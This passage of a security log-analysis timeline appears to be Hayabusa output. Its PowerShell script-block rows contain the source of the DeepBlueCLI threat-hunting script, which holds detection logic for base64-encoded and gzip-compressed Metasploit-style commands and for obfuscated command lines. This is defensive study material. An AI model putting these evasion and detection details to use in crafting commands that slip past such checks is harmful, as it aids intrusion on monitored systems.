@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.482 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.485 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:58:22.516 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:58:22.516 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:58:22.517 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:58:22.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:58:28.692 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:30.619 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.969 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* 